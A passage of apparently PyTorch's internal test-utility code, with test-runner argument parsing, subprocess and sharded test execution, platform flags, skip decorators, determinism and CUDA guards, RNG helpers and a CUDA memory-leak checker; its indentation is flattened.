torch._C._jit_set_profiling_mode(old_prof_mode_state)
@contextmanager
def num_profiled_runs(num_runs):
old_num_runs = torch._C._jit_set_num_profiled_runs(num_runs)
try:
yield
finally:
torch._C._jit_set_num_profiled_runs(old_num_runs)
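# Illustrative sketch of the profiling context managers above; `scripted_fn` and
# `example_input` are hypothetical and assumed to be defined elsewhere:
#
#   with enable_profiling_mode_for_profiling_tests(), num_profiled_runs(2):
#       scripted_fn(example_input)   # profiled run
#       scripted_fn(example_input)   # profiled run
#       scripted_fn(example_input)   # typically executes the optimized graph from here on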
func_call = torch._C.ScriptFunction.__call__
meth_call = torch._C.ScriptMethod.__call__
def prof_callable(callable, *args, **kwargs):
if 'profile_and_replay' in kwargs:
del kwargs['profile_and_replay']
if GRAPH_EXECUTOR == ProfilingMode.PROFILING:
with enable_profiling_mode_for_profiling_tests():
callable(*args, **kwargs)
return callable(*args, **kwargs)
return callable(*args, **kwargs)
def prof_func_call(*args, **kwargs):
return prof_callable(func_call, *args, **kwargs)
def prof_meth_call(*args, **kwargs):
return prof_callable(meth_call, *args, **kwargs)
# TODO fix when https://github.com/python/mypy/issues/2427 is addressed
torch._C.ScriptFunction.__call__ = prof_func_call # type: ignore[assignment]
torch._C.ScriptMethod.__call__ = prof_meth_call # type: ignore[assignment]
def _get_test_report_path():
# allow users to override the test file location. We need this
# because the distributed tests run the same test file multiple
# times with different configurations.
override = os.environ.get('TEST_REPORT_SOURCE_OVERRIDE')
test_source = override if override is not None else 'python-unittest'
return os.path.join('test-reports', test_source)
parser = argparse.ArgumentParser()
parser.add_argument('--subprocess', action='store_true',
help='whether to run each test in a subprocess')
parser.add_argument('--seed', type=int, default=1234)
parser.add_argument('--accept', action='store_true')
parser.add_argument('--jit_executor', type=str)
parser.add_argument('--repeat', type=int, default=1)
parser.add_argument('--test_bailouts', action='store_true')
parser.add_argument('--save-xml', nargs='?', type=str,
const=_get_test_report_path(),
default=_get_test_report_path() if IS_IN_CI else None)
parser.add_argument('--discover-tests', action='store_true')
parser.add_argument('--log-suffix', type=str, default="")
parser.add_argument('--run-parallel', type=int, default=1)
parser.add_argument('--import-slow-tests', type=str, nargs='?', const=SLOW_TESTS_FILE)
parser.add_argument('--import-disabled-tests', type=str, nargs='?', const=DISABLED_TESTS_FILE)
# Only run when -h or --help flag is active to display both unittest and parser help messages.
def run_unittest_help(argv):
unittest.main(argv=argv)
if '-h' in sys.argv or '--help' in sys.argv:
help_thread = threading.Thread(target=run_unittest_help, args=(sys.argv,))
help_thread.start()
help_thread.join()
args, remaining = parser.parse_known_args()
if args.jit_executor == 'legacy':
GRAPH_EXECUTOR = ProfilingMode.LEGACY
elif args.jit_executor == 'profiling':
GRAPH_EXECUTOR = ProfilingMode.PROFILING
elif args.jit_executor == 'simple':
GRAPH_EXECUTOR = ProfilingMode.SIMPLE
else:
# infer flags based on the default settings
GRAPH_EXECUTOR = cppProfilingFlagsToProfilingMode()
IMPORT_SLOW_TESTS = args.import_slow_tests
IMPORT_DISABLED_TESTS = args.import_disabled_tests
LOG_SUFFIX = args.log_suffix
RUN_PARALLEL = args.run_parallel
TEST_BAILOUTS = args.test_bailouts
TEST_DISCOVER = args.discover_tests
TEST_IN_SUBPROCESS = args.subprocess
TEST_SAVE_XML = args.save_xml
REPEAT_COUNT = args.repeat
SEED = args.seed
if not expecttest.ACCEPT:
expecttest.ACCEPT = args.accept
UNITTEST_ARGS = [sys.argv[0]] + remaining
torch.manual_seed(SEED)
# CI Prefix path used only on CI environment
CI_TEST_PREFIX = str(Path(os.getcwd()))
def wait_for_process(p):
try:
return p.wait()
except KeyboardInterrupt:
# Give `p` a chance to handle KeyboardInterrupt. Without this,
# `pytest` can't print errors it collected so far upon KeyboardInterrupt.
exit_status = p.wait(timeout=5)
if exit_status is not None:
return exit_status
else:
p.kill()
raise
except: # noqa: B001,E722, copied from python core library
p.kill()
raise
finally:
# Always call p.wait() to ensure exit
p.wait()
def shell(command, cwd=None, env=None):
sys.stdout.flush()
sys.stderr.flush()
# The following snippet is copied from the Python 3 core library's subprocess.call, with:
# 1. an `except KeyboardInterrupt` block added for SIGINT handling, and
# 2. `p.wait()` done in a `finally` block so the code stays portable to Python 2, where
#    subprocess.Popen doesn't return a context manager.
#
# https://github.com/python/cpython/blob/71b6c1af727fbe13525fb734568057d78cea33f3/Lib/subprocess.py#L309-L323
assert not isinstance(command, torch._six.string_classes), "Command to shell should be a list or tuple of tokens"
p = subprocess.Popen(command, universal_newlines=True, cwd=cwd, env=env)
return wait_for_process(p)
def discover_test_cases_recursively(suite_or_case):
if isinstance(suite_or_case, unittest.TestCase):
return [suite_or_case]
rc = []
for element in suite_or_case:
print(element)
rc.extend(discover_test_cases_recursively(element))
return rc
def get_test_names(test_cases):
return ['.'.join(case.id().split('.')[-2:]) for case in test_cases]
def _print_test_names():
suite = unittest.TestLoader().loadTestsFromModule(__main__)
test_cases = discover_test_cases_recursively(suite)
for name in get_test_names(test_cases):
print(name)
def chunk_list(lst, nchunks):
return [lst[i::nchunks] for i in range(nchunks)]
# sanitize filename e.g., distributed/pipeline/sync/skip/test_api.py -> distributed.pipeline.sync.skip.test_api
def sanitize_test_filename(filename):
# inspect.getfile returns absolute path in some CI jobs, converting it to relative path if needed
if filename.startswith(CI_TEST_PREFIX):
filename = filename[len(CI_TEST_PREFIX) + 1:]
strip_py = re.sub(r'.py$', '', filename)
return re.sub('/', r'.', strip_py)
def lint_test_case_extension(suite):
succeed = True
for test_case_or_suite in suite:
test_case = test_case_or_suite
if isinstance(test_case_or_suite, unittest.TestSuite):
first_test = test_case_or_suite._tests[0] if len(test_case_or_suite._tests) > 0 else None
if first_test is not None and isinstance(first_test, unittest.TestSuite):
return succeed and lint_test_case_extension(test_case_or_suite)
test_case = first_test
if test_case is not None:
test_class = test_case.id().split('.', 1)[1].split('.')[0]
if not isinstance(test_case, TestCase):
err = "This test class should extend from torch.testing._internal.common_utils.TestCase but it doesn't."
print(f"{test_class} - failed. {err}")
succeed = False
return succeed
def run_tests(argv=UNITTEST_ARGS):
# import test files.
if IMPORT_SLOW_TESTS:
if os.path.exists(IMPORT_SLOW_TESTS):
global slow_tests_dict
with open(IMPORT_SLOW_TESTS, 'r') as fp:
slow_tests_dict = json.load(fp)
else:
print(f'[WARNING] slow test file provided but not found: {IMPORT_SLOW_TESTS}')
if IMPORT_DISABLED_TESTS:
if os.path.exists(IMPORT_DISABLED_TESTS):
global disabled_tests_dict
with open(IMPORT_DISABLED_TESTS, 'r') as fp:
disabled_tests_dict = json.load(fp)
else:
print(f'[WARNING] disabled test file provided but not found: {IMPORT_DISABLED_TESTS}')
# Determine the test launch mechanism
if TEST_DISCOVER:
_print_test_names()
return
# Before running the tests, lint to check that every test class extends from TestCase
suite = unittest.TestLoader().loadTestsFromModule(__main__)
if not lint_test_case_extension(suite):
sys.exit(1)
if TEST_IN_SUBPROCESS:
failed_tests = []
test_cases = discover_test_cases_recursively(suite)
for case in test_cases:
test_case_full_name = case.id().split('.', 1)[1]
other_args = []
if IMPORT_DISABLED_TESTS:
other_args.append('--import-disabled-tests')
if IMPORT_SLOW_TESTS:
other_args.append('--import-slow-tests')
cmd = [sys.executable] + [argv[0]] + other_args + argv[1:] + [test_case_full_name]
string_cmd = " ".join(cmd)
exitcode = shell(cmd)
if exitcode != 0:
# This is sort of hacky, but add on relevant env variables for distributed tests.
if 'TestDistBackendWithSpawn' in test_case_full_name:
backend = os.environ.get("BACKEND", "")
world_size = os.environ.get("WORLD_SIZE", "")
env_prefix = f"BACKEND={backend} WORLD_SIZE={world_size}"
string_cmd = env_prefix + " " + string_cmd
# Log the command to reproduce the failure.
print(f"Test exited with non-zero exitcode {exitcode}. Command to reproduce: {string_cmd}")
failed_tests.append(test_case_full_name)
assert len(failed_tests) == 0, "{} unit test(s) failed:\n\t{}".format(
len(failed_tests), '\n\t'.join(failed_tests))
elif RUN_PARALLEL > 1:
test_cases = discover_test_cases_recursively(suite)
test_batches = chunk_list(get_test_names(test_cases), RUN_PARALLEL)
processes = []
for i in range(RUN_PARALLEL):
command = [sys.executable] + argv + ['--log-suffix=-shard-{}'.format(i + 1)] + test_batches[i]
processes.append(subprocess.Popen(command, universal_newlines=True))
failed = False
for p in processes:
failed |= wait_for_process(p) != 0
assert not failed, "Some test shards have failed"
elif TEST_SAVE_XML is not None:
# import here so that non-CI doesn't need xmlrunner installed
import xmlrunner # type: ignore[import]
test_filename = sanitize_test_filename(inspect.getfile(sys._getframe(1)))
test_report_path = TEST_SAVE_XML + LOG_SUFFIX
test_report_path = os.path.join(test_report_path, test_filename)
os.makedirs(test_report_path, exist_ok=True)
verbose = '--verbose' in argv or '-v' in argv
if verbose:
print('Test results will be stored in {}'.format(test_report_path))
unittest.main(argv=argv, testRunner=xmlrunner.XMLTestRunner(output=test_report_path, verbosity=2 if verbose else 1))
elif REPEAT_COUNT > 1:
for _ in range(REPEAT_COUNT):
if not unittest.main(exit=False, argv=argv).result.wasSuccessful():
sys.exit(-1)
else:
unittest.main(argv=argv)
IS_LINUX = sys.platform == "linux"
IS_WINDOWS = sys.platform == "win32"
IS_MACOS = sys.platform == "darwin"
IS_PPC = platform.machine() == "ppc64le"
def is_avx512_vnni_supported():
if sys.platform != 'linux':
return False
with open("/proc/cpuinfo", encoding="ascii") as f:
lines = f.read()
return "vnni" in lines
IS_AVX512_VNNI_SUPPORTED = is_avx512_vnni_supported()
if IS_WINDOWS:
@contextmanager
def TemporaryFileName(*args, **kwargs):
# Ideally we would like to not have to manually delete the file, but NamedTemporaryFile
# opens the file, and it cannot be opened multiple times in Windows. To support Windows,
# close the file after creation and try to remove it manually
if 'delete' in kwargs:
if kwargs['delete'] is not False:
raise UserWarning("only TemporaryFileName with delete=False is supported on Windows.")
else:
kwargs['delete'] = False
f = tempfile.NamedTemporaryFile(*args, **kwargs)
try:
f.close()
yield f.name
finally:
os.unlink(f.name)
else:
@contextmanager # noqa: T484
def TemporaryFileName(*args, **kwargs):
with tempfile.NamedTemporaryFile(*args, **kwargs) as f:
yield f.name
if IS_WINDOWS:
@contextmanager
def TemporaryDirectoryName(suffix=None):
# On Windows the directory created by TemporaryDirectory is likely to be removed prematurely,
# so we first create the directory using mkdtemp and then remove it manually
try:
dir_name = tempfile.mkdtemp(suffix=suffix)
yield dir_name
finally:
shutil.rmtree(dir_name)
else:
@contextmanager # noqa: T484
def TemporaryDirectoryName(suffix=None):
with tempfile.TemporaryDirectory(suffix=suffix) as d:
yield d
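# Illustrative sketch of the cross-platform temporary file/directory helpers above:
#
#   with TemporaryFileName(suffix='.pt') as fname:
#       torch.save(torch.ones(3), fname)
#       loaded = torch.load(fname)
#
#   with TemporaryDirectoryName() as dirname:
#       torch.save(torch.zeros(2), os.path.join(dirname, 'checkpoint.pt'))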
IS_FILESYSTEM_UTF8_ENCODING = sys.getfilesystemencoding() == 'utf-8'
def _check_module_exists(name: str) -> bool:
r"""Returns if a top-level module with :attr:`name` exists *without**
importing it. This is generally safer than try-catch block around a
`import X`. It avoids third party libraries breaking assumptions of some of
our tests, e.g., setting multiprocessing start method when imported
(see librosa/#747, torchvision/#544).
"""
try:
import importlib.util
spec = importlib.util.find_spec(name)
return spec is not None
except ImportError:
return False
TEST_NUMPY = _check_module_exists('numpy')
TEST_SCIPY = _check_module_exists('scipy')
TEST_MKL = torch.backends.mkl.is_available()
TEST_CUDA = torch.cuda.is_available()
TEST_NUMBA = _check_module_exists('numba')
TEST_DILL = _check_module_exists('dill')
TEST_LIBROSA = _check_module_exists('librosa')
BUILD_WITH_CAFFE2 = _check_module_exists("caffe2.python.caffe2_pybind11_state")
# Python 2.7 doesn't have spawn
NO_MULTIPROCESSING_SPAWN = os.environ.get('NO_MULTIPROCESSING_SPAWN', '0') == '1'
TEST_WITH_ASAN = os.getenv('PYTORCH_TEST_WITH_ASAN', '0') == '1'
TEST_WITH_DEV_DBG_ASAN = os.getenv('PYTORCH_TEST_WITH_DEV_DBG_ASAN', '0') == '1'
TEST_WITH_TSAN = os.getenv('PYTORCH_TEST_WITH_TSAN', '0') == '1'
TEST_WITH_UBSAN = os.getenv('PYTORCH_TEST_WITH_UBSAN', '0') == '1'
TEST_WITH_ROCM = os.getenv('PYTORCH_TEST_WITH_ROCM', '0') == '1'
# TODO: Remove PYTORCH_MIOPEN_SUGGEST_NHWC once ROCm officially supports NHWC in MIOpen
# See #64427
TEST_WITH_MIOPEN_SUGGEST_NHWC = os.getenv('PYTORCH_MIOPEN_SUGGEST_NHWC', '0') == '1'
# Enables tests that are slow to run (disabled by default)
TEST_WITH_SLOW = os.getenv('PYTORCH_TEST_WITH_SLOW', '0') == '1'
# Disables non-slow tests (these tests are enabled by default)
# This is usually used in conjunction with TEST_WITH_SLOW to
# run *only* slow tests. (I could have done an enum, but
# it felt a little awkward.)
TEST_SKIP_FAST = os.getenv('PYTORCH_TEST_SKIP_FAST', '0') == '1'
# Disables noarch tests; all but one CI configuration disables these. We don't
# disable them for local runs because you still want to run them
# (unlike slow tests!)
TEST_SKIP_NOARCH = os.getenv('PYTORCH_TEST_SKIP_NOARCH', '0') == '1'
# Determine whether to enable cuda memory leak check.
# CUDA mem leak check is expensive and thus we don't want to execute it on every
# test case / configuration.
# If this is True then CUDA memory leak checks are skipped. If this is false
# then CUDA memory leak checks are performed.
# See: https://github.com/pytorch/pytorch/pull/59402#issuecomment-858811135
TEST_SKIP_CUDA_MEM_LEAK_CHECK = os.getenv('PYTORCH_TEST_SKIP_CUDA_MEM_LEAK_CHECK', '0') == '1'
# Disables tests when running on GitHub Actions
ON_GHA = os.getenv('GITHUB_ACTIONS', '0') == '1'
# True if CI is running TBB-enabled PyTorch
IS_TBB = "tbb" in os.getenv("BUILD_ENVIRONMENT", "")
# Dict of NumPy dtype -> torch dtype (when the correspondence exists)
numpy_to_torch_dtype_dict = {
np.bool_ : torch.bool,
np.uint8 : torch.uint8,
np.int8 : torch.int8,
np.int16 : torch.int16,
np.int32 : torch.int32,
np.int64 : torch.int64,
np.float16 : torch.float16,
np.float32 : torch.float32,
np.float64 : torch.float64,
np.complex64 : torch.complex64,
np.complex128 : torch.complex128
}
if IS_WINDOWS:
# Size of `np.intc` is platform defined.
# It is returned by functions like `bitwise_not`.
# On Windows `int` is 32-bit
# https://docs.microsoft.com/en-us/cpp/cpp/data-type-ranges?view=msvc-160
numpy_to_torch_dtype_dict[np.intc] = torch.int
# Dict of torch dtype -> NumPy dtype
torch_to_numpy_dtype_dict = {value : key for (key, value) in numpy_to_torch_dtype_dict.items()}
ALL_TENSORTYPES = [torch.float,
torch.double,
torch.half]
# bfloat16 bringup is currently only available on ROCm
# ALL_TENSORTYPES2 will eventually be unified with ALL_TENSORTYPES
# when bfloat16 bringup is complete on all platforms
if TEST_WITH_ROCM:
ALL_TENSORTYPES2 = [torch.float,
torch.double,
torch.half,
torch.bfloat16]
else:
ALL_TENSORTYPES2 = ALL_TENSORTYPES
def skipIfRocm(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if TEST_WITH_ROCM:
raise unittest.SkipTest("test doesn't currently work on the ROCm stack")
else:
fn(*args, **kwargs)
return wrapper
# Skips a test on CUDA if ROCm is unavailable or its version is lower than requested.
def skipIfRocmVersionLessThan(version=None):
def dec_fn(fn):
@wraps(fn)
def wrap_fn(self, *args, **kwargs):
if not TEST_WITH_ROCM:
reason = "ROCm not available"
raise unittest.SkipTest(reason)
rocm_version = str(torch.version.hip)
rocm_version = rocm_version.split("-")[0] # ignore git sha
rocm_version_tuple = tuple(int(x) for x in rocm_version.split("."))
if rocm_version_tuple is None or version is None or rocm_version_tuple < tuple(version):
reason = "ROCm {0} is available but {1} required".format(rocm_version_tuple, version)
raise unittest.SkipTest(reason)
return fn(self, *args, **kwargs)
return wrap_fn
return dec_fn
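# Illustrative sketch (hypothetical test method): the factory above takes the minimum ROCm
# version as a tuple and skips on non-ROCm builds or on older ROCm versions.
#
#   @skipIfRocmVersionLessThan((4, 3))
#   def test_needs_recent_rocm(self):
#       ...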
def skipIfNotMiopenSuggestNHWC(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not TEST_WITH_MIOPEN_SUGGEST_NHWC:
raise unittest.SkipTest("test doesn't currently work without MIOpen NHWC activation")
else:
fn(*args, **kwargs)
return wrapper
# Context manager for setting deterministic flag and automatically
# resetting it to its original value
class DeterministicGuard:
def __init__(self, deterministic, *, warn_only=False):
self.deterministic = deterministic
self.warn_only = warn_only
def __enter__(self):
self.deterministic_restore = torch.are_deterministic_algorithms_enabled()
self.warn_only_restore = torch.is_deterministic_algorithms_warn_only_enabled()
torch.use_deterministic_algorithms(
self.deterministic,
warn_only=self.warn_only)
def __exit__(self, exception_type, exception_value, traceback):
torch.use_deterministic_algorithms(
self.deterministic_restore,
warn_only=self.warn_only_restore)
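# Illustrative sketch of DeterministicGuard; `run_op_under_test` is a hypothetical helper:
#
#   with DeterministicGuard(True):
#       run_op_under_test()   # deterministic algorithms are enforced inside the block
#   # the previous deterministic/warn_only settings are restored on exit, even on exceptions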
# Context manager for setting cuda sync debug mode and reset it
# to original value
# we are not exposing it to the core because sync debug mode is
# global and thus not thread safe
class CudaSyncGuard:
def __init__(self, sync_debug_mode):
self.mode = sync_debug_mode
def __enter__(self):
self.debug_mode_restore = torch.cuda.get_sync_debug_mode()
torch.cuda.set_sync_debug_mode(self.mode)
def __exit__(self, exception_type, exception_value, traceback):
torch.cuda.set_sync_debug_mode(self.debug_mode_restore)
# This decorator can be used for API tests that call
# torch.use_deterministic_algorithms(). When the test is finished, it will
# restore the previous deterministic flag setting.
#
# If CUDA >= 10.2, this will set the environment variable
# CUBLAS_WORKSPACE_CONFIG=:4096:8 so that the error associated with that
# setting is not thrown during the test unless the test changes that variable
# on purpose. The previous CUBLAS_WORKSPACE_CONFIG setting will also be
# restored once the test is finished.
#
# Note that if a test requires CUDA to actually register the changed
# CUBLAS_WORKSPACE_CONFIG variable, a new subprocess must be created, because
# CUDA only checks the variable when the runtime initializes. Tests can be
# run inside a subprocess like so:
#
# import subprocess, sys, os
# script = '''
# # Test code should go here
# '''
# try:
# subprocess.check_output(
# [sys.executable, '-c', script],
# stderr=subprocess.STDOUT,
# cwd=os.path.dirname(os.path.realpath(__file__)),
# env=os.environ.copy())
# except subprocess.CalledProcessError as e:
# error_message = e.output.decode('utf-8')
# # Handle exceptions raised by the subprocess here
#
def wrapDeterministicFlagAPITest(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
with DeterministicGuard(
torch.are_deterministic_algorithms_enabled(),
warn_only=torch.is_deterministic_algorithms_warn_only_enabled()):
class CuBLASConfigGuard:
cublas_var_name = 'CUBLAS_WORKSPACE_CONFIG'
def __enter__(self):
self.is_cuda10_2_or_higher = (
(torch.version.cuda is not None)
and ([int(x) for x in torch.version.cuda.split(".")] >= [10, 2]))
if self.is_cuda10_2_or_higher:
self.cublas_config_restore = os.environ.get(self.cublas_var_name)
os.environ[self.cublas_var_name] = ':4096:8'
def __exit__(self, exception_type, exception_value, traceback):
if self.is_cuda10_2_or_higher:
cur_cublas_config = os.environ.get(self.cublas_var_name)
if self.cublas_config_restore is None:
if cur_cublas_config is not None:
del os.environ[self.cublas_var_name]
else:
os.environ[self.cublas_var_name] = self.cublas_config_restore
with CuBLASConfigGuard():
fn(*args, **kwargs)
return wrapper
def skipIfCompiledWithoutNumpy(fn):
# Even if the numpy module is present, if `USE_NUMPY=0` is used during the
# build, numpy tests will fail
numpy_support = TEST_NUMPY
if numpy_support:
try:
# The numpy module is present, verify that PyTorch is compiled with
# numpy support
torch.from_numpy(np.array([2, 2]))
except RuntimeError:
numpy_support = False
@wraps(fn)
def wrapper(*args, **kwargs):
if not numpy_support:
raise unittest.SkipTest("PyTorch was compiled without numpy support")
else:
fn(*args, **kwargs)
return wrapper
def _test_function(fn, device):
def run_test_function(self):
return fn(self, device)
return run_test_function
def skipIfNoLapack(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not torch._C.has_lapack:
raise unittest.SkipTest('PyTorch compiled without Lapack')
else:
fn(*args, **kwargs)
return wrapper
def skipIfNotRegistered(op_name, message):
"""Wraps the decorator to hide the import of the `core`.
Args:
op_name: Check if this op is registered in `core._REGISTERED_OPERATORS`.
message: message to fail with.
Usage:
@skipIfNotRegistered('MyOp', 'MyOp is not linked!')
This will check if 'MyOp' is registered in caffe2.python.core.
"""
if not BUILD_WITH_CAFFE2:
return unittest.skip("Pytorch is compiled without Caffe2")
try:
from caffe2.python import core
skipper = unittest.skipIf(op_name not in core._REGISTERED_OPERATORS,
message)
except ImportError:
skipper = unittest.skip("Cannot import `caffe2.python.core`")
return skipper
def skipIfNoSciPy(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not TEST_SCIPY:
raise unittest.SkipTest("test require SciPy, but SciPy not found")
else:
fn(*args, **kwargs)
return wrapper
def skipIfOnGHA(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if ON_GHA:
raise unittest.SkipTest("Test disabled for GHA")
else:
fn(*args, **kwargs)
return wrapper
def skipIfTBB(message="This test makes TBB sad"):
def dec_fn(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if IS_TBB:
raise unittest.SkipTest(message)
else:
fn(*args, **kwargs)
return wrapper
return dec_fn
def slowTest(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if not TEST_WITH_SLOW:
raise unittest.SkipTest("test is slow; run with PYTORCH_TEST_WITH_SLOW to enable test")
else:
fn(*args, **kwargs)
wrapper.__dict__['slow_test'] = True
return wrapper
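# Illustrative sketch (hypothetical test method): @slowTest makes the test run only when
# PYTORCH_TEST_WITH_SLOW=1 is set; otherwise it is skipped.
#
#   @slowTest
#   def test_big_matmul(self):
#       ...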
# noarch tests are tests that should only be run on one CI configuration,
# because they don't exercise any interesting platform-specific code;
# a single passing run indicates the test should pass everywhere.
# See https://github.com/pytorch/pytorch/issues/53743
def noarchTest(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
if TEST_SKIP_NOARCH:
raise unittest.SkipTest("test is noarch: we are skipping noarch tests due to TEST_SKIP_NOARCH")
else:
fn(*args, **kwargs)
return wrapper
def slowAwareTest(fn):
fn.__dict__['slow_test'] = True
return fn
def skipCUDAMemoryLeakCheckIf(condition):
def dec(fn):
if getattr(fn, '_do_cuda_memory_leak_check', True):  # if currently True
fn._do_cuda_memory_leak_check = not condition
return fn
return dec
def skipCUDANonDefaultStreamIf(condition):
def dec(fn):
if getattr(fn, '_do_cuda_non_default_stream', True):  # if currently True
fn._do_cuda_non_default_stream = not condition
return fn
return dec
def suppress_warnings(fn):
@wraps(fn)
def wrapper(*args, **kwargs):
with warnings.catch_warnings():
warnings.simplefilter("ignore")
fn(*args, **kwargs)
return wrapper
def to_gpu(obj, type_map=None):
if type_map is None:
type_map = {}
if isinstance(obj, torch.Tensor):
assert obj.is_leaf
t = type_map.get(obj.dtype, obj.dtype)
with torch.no_grad():
res = obj.clone().to(dtype=t, device="cuda")
res.requires_grad = obj.requires_grad
return res
elif torch.is_storage(obj):
return obj.new().resize_(obj.size()).copy_(obj)
elif isinstance(obj, list):
return [to_gpu(o, type_map) for o in obj]
elif isinstance(obj, tuple):
return tuple(to_gpu(o, type_map) for o in obj)
else:
return deepcopy(obj)
def get_function_arglist(func):
return inspect.getfullargspec(func).args
def set_rng_seed(seed):
torch.manual_seed(seed)
random.seed(seed)
if TEST_NUMPY:
np.random.seed(seed)
@contextlib.contextmanager
def freeze_rng_state():
# no_dispatch needed for test_composite_compliance
# Some OpInfos use freeze_rng_state for rng determinism, but
# test_composite_compliance overrides dispatch for all torch functions
# which we need to disable to get and set rng state
with no_dispatch():
rng_state = torch.get_rng_state()
if torch.cuda.is_available():
cuda_rng_state = torch.cuda.get_rng_state()
try:
yield
finally:
with no_dispatch():
if torch.cuda.is_available():
torch.cuda.set_rng_state(cuda_rng_state)
torch.set_rng_state(rng_state)
@contextlib.contextmanager
def set_default_dtype(dtype):
saved_dtype = torch.get_default_dtype()
torch.set_default_dtype(dtype)
try:
yield
finally:
torch.set_default_dtype(saved_dtype)
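# Illustrative sketch of the two context managers above:
#
#   with set_default_dtype(torch.float64):
#       x = torch.randn(3)    # x.dtype is torch.float64 inside the block
#   # the previous default dtype is restored here
#
#   with freeze_rng_state():
#       _ = torch.rand(4)     # consumes RNG state inside the block...
#   # ...but the CPU (and CUDA, if available) RNG state is restored on exit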
def iter_indices(tensor):
if tensor.dim() == 0:
return range(0)
if tensor.dim() == 1:
return range(tensor.size(0))
return product(*(range(s) for s in tensor.size()))
def is_iterable(obj):
try:
iter(obj)
return True
except TypeError:
return False
def is_iterable_of_tensors(iterable, include_empty=False):
""" Returns True if iterable is an iterable of tensors and False o.w.
If the iterable is empty, the return value is :attr:`include_empty`
"""
# Tensor itself is iterable so we check this first
if isinstance(iterable, torch.Tensor):
return False
try:
if len(iterable) == 0:
return include_empty
for t in iter(iterable):
if not isinstance(t, torch.Tensor):
return False
except TypeError:
return False
return True
class CudaNonDefaultStream():
def __enter__(self):
# Before starting CUDA test save currently active streams on all
# CUDA devices and set new non default streams to all CUDA devices
# to ensure CUDA tests do not use default stream by mistake.
beforeDevice = torch.cuda.current_device()
self.beforeStreams = []
for d in range(torch.cuda.device_count()):
self.beforeStreams.append(torch.cuda.current_stream(d))
deviceStream = torch.cuda.Stream(device=d)
torch._C._cuda_setStream(deviceStream._cdata)
torch._C._cuda_setDevice(beforeDevice)
def __exit__(self, exec_type, exec_value, traceback):
# After completing CUDA test load previously active streams on all
# CUDA devices.
beforeDevice = torch.cuda.current_device()
for d in range(torch.cuda.device_count()):
torch._C._cuda_setStream(self.beforeStreams[d]._cdata)
torch._C._cuda_setDevice(beforeDevice)
class CudaMemoryLeakCheck():
def __init__(self, testcase, name=None):
self.name = testcase.id() if name is None else name
self.testcase = testcase
# initialize context & RNG to prevent false positive detections
# when the test is the first to initialize those
from torch.testing._internal.common_cuda import initialize_cuda_context_rng
initialize_cuda_context_rng()
# Stores CUDA memory data provided by PyTorch's caching allocator and
# the CUDA driver.
#
# NOTE: The undocumented torch.cuda.mem_get_info() returns
# (#free bytes, #total bytes available) on the GPU
def __enter__(self):
self.caching_allocator_befores = []
self.driver_befores = []
# Performs a gc if required (required if any CUDA memory is held)
num_devices = torch.cuda.device_count()
for i in range(num_devices):
caching_allocator_mem_allocated = torch.cuda.memory_allocated(i)
# NOTE: gc is based exclusively on caching allocator memory
# because the driver will always have some bytes in use (context size?)
if caching_allocator_mem_allocated > 0:
gc.collect()
torch.cuda.empty_cache()
break
# Acquires caching allocator and driver statistics before the test is run
for i in range(num_devices):
self.caching_allocator_befores.append(torch.cuda.memory_allocated(i))
bytes_free, bytes_total = torch.cuda.mem_get_info(i)
driver_mem_allocated = bytes_total - bytes_free
self.driver_befores.append(driver_mem_allocated)
def __exit__(self, exec_type, exec_value, traceback):
# Don't check for leaks if an exception was thrown
if exec_type is not None:
return
# Compares caching allocator before/after statistics
# An increase in allocated memory is a discrepancy indicating a possible
# memory leak
discrepancy_detected = False
num_devices = torch.cuda.device_count()
for i in range(num_devices):
caching_allocator_mem_allocated = torch.cuda.memory_allocated(i)
if caching_allocator_mem_allocated > self.caching_allocator_befores[i]:
discrepancy_detected = True
break
# Short-circuits if no discrepancy detected
if not discrepancy_detected:
return
# Validates the discrepancy persists after garbage collection and
# is confirmed by the driver API
# NOTE: driver API discrepancies alone are ignored because with the jiterator
# some tests may permanently increase the CUDA context size and
# that will appear as a driver memory leak but is the expected behavior.
# GCs and clears the cache
gc.collect()
torch.cuda.empty_cache()
for i in range(num_devices):
caching_allocator_mem_allocated = torch.cuda.memory_allocated(i)
bytes_free, bytes_total = torch.cuda.mem_get_info(i)
driver_mem_allocated = bytes_total - bytes_free
caching_allocator_discrepancy = False
driver_discrepancy = False
if caching_allocator_mem_allocated > self.caching_allocator_befores[i]:
caching_allocator_discrepancy = True
if driver_mem_allocated > self.driver_befores[i]:
driver_discrepancy = True
if caching_allocator_discrepancy and not driver_discrepancy:
# Just raises a warning if the leak is not validated by the
# driver API
# NOTE: this may be a problem with how the caching allocator collects its
# statistics or a leak too small to trigger the allocation of an
# additional block of memory by the CUDA driver
msg = ("CUDA caching allocator reports a memory leak not "
"verified by the driver API in {}! "
"Caching allocator allocated memory was {} and is now reported as {} "
"on device {}. "
"CUDA driver allocated memory was {} and is now {}.").format(
self.name,
self.caching_allocator_befores[i],
caching_allocator_mem_allocated,
i,
self.driver_befores[i],
driver_mem_allocated)
warnings.warn(msg)
elif caching_allocator_discrepancy and driver_discrepancy:
# A caching allocator discrepancy validated by the driver API is a
# failure (except on ROCm, see below)
msg = ("CUDA driver API confirmed a leak in {}! "
"Caching allocator allocated memory was {} and is now reported as {} "
"on device {}. "
"CUDA driver allocated memory was {} and is now {}.").format(
self.name,
self.caching_allocator_befores[i],
caching_allocator_mem_allocated,
i,
self.driver_befores[i],
driver_mem_allocated)
# See #62533
# ROCM: Sometimes the transient memory is reported as leaked memory
if TEST_WITH_ROCM:
warnings.warn(msg)
else:
raise RuntimeError(msg)
@contextmanager
def skip_exception_type(exc_type):
try:
yield
except exc_type as e:
raise unittest.SkipTest(f"not implemented: {e}") from e
# "min_satisfying_examples" setting has been deprecated in hypythesis
# 3.56.0 and removed in hypothesis 4.x
try:
import hypothesis
def settings(*args, **kwargs):
if 'min_satisfying_examples' in kwargs and hypothesis.version.__version_info__ >= (3, 56, 0):
kwargs.pop('min_satisfying_examples')
return hypothesis.settings(*args, **kwargs)
hypothesis.settings.register_profile(
"pytorch_ci",
settings(
derandomize=True,
suppress_health_check=[hypothesis.HealthCheck.too_slow],
database=None,
max_examples=50,
verbosity=hypothesis.Verbosity.normal))
hypothesis.settings.register_profile(
"dev",
settings(
